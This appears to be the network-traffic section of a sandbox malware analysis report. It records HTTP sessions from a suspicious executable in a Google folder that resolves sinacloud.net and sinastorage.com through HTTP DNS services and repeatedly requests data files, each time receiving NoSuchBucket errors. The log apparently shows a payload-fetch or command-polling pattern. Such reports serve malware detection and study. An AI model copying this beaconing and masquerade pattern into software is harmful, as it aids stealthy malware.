                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32b98376-2412-0521-2518-b4055d752c87</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.54971927.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:16.337491035 CET236OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:18.095194101 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:15 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 35287258-2412-0521-2517-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 37 32 35 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 37 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35287258-2412-0521-2517-6c92bfce66d4</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.549721182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:18.400424004 CET86OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:20.254897118 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.549722114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:18.400489092 CET86OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.549723119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:18.400599957 CET83OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:19.638938904 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.54972527.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:19.330724001 CET244OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:21.160648108 CET512INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 767f865b-2412-0521-2520-b0087553a6a0
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 66 38 36 35 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 30 2d 62 30 30 38 37 35 35 33 61 36 61 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>767f865b-2412-0521-2520-b0087553a6a0</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.54972627.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:19.767446041 CET236OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:21.555491924 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:12 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a92b43-2412-0521-2521-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 32 62 34 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 31 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>32a92b43-2412-0521-2521-b4055d752a1d</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.54972927.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:21.436161041 CET244OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:23.254631996 CET512INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:14 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 766b7ab3-2412-0521-2522-5ca7213e028c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 62 37 61 62 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 32 2d 35 63 61 37 32 31 33 65 30 32 38 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>766b7ab3-2412-0521-2522-5ca7213e028c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549730114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:21.468045950 CET86OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.54973127.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:21.683207035 CET236OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:23.479823112 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c91b69-2412-0521-2523-5ca7213e04cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 31 62 36 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 33 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>76c91b69-2412-0521-2523-5ca7213e04cc</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.54973927.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:23.381920099 CET244OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:25.138626099 CET512INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32f42f93-2412-0521-2524-b4055d752c57
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 66 34 32 66 39 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 34 2d 62 34 30 35 35 64 37 35 32 63 35 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32f42f93-2412-0521-2524-b4055d752c57</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.549751123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:28.682466030 CET238OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:30.289377928 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:30 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f07294-2412-0521-2530-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 30 37 32 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 30 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f07294-2412-0521-2530-6c92bfce66de</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.549752123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:28.682508945 CET246OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:30.257421970 CET536INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22080916-2b967e2
                                                                                Date: Thu, 05 Dec 2024 13:25:29 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: c029e56c-2412-0521-2529-0894eff93358
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 39 65 35 36 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 39 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>c029e56c-2412-0521-2529-0894eff93358</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.549758119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:30.384088039 CET85OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089039087 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.549759182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:30.384202003 CET88OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:31.983479023 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.549761182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:30.415700912 CET88OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:31.984484911 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.549760119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:30.417613029 CET85OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:32.084537029 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.549767183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:32.112603903 CET246OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:33.685414076 CET536INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:33 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7465048a-2412-0521-2533-047bcb4b6b04
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 35 30 34 38 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 33 2d 30 34 37 62 63 62 34 62 36 62 30 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465048a-2412-0521-2533-047bcb4b6b04</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.549768183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:32.126265049 CET238OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:33.685031891 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:33 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 765b09e8-2412-0521-2533-5ca7213e0802
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 35 62 30 39 65 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 33 2d 35 63 61 37 32 31 33 65 30 38 30 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>765b09e8-2412-0521-2533-5ca7213e0802</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.549784114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
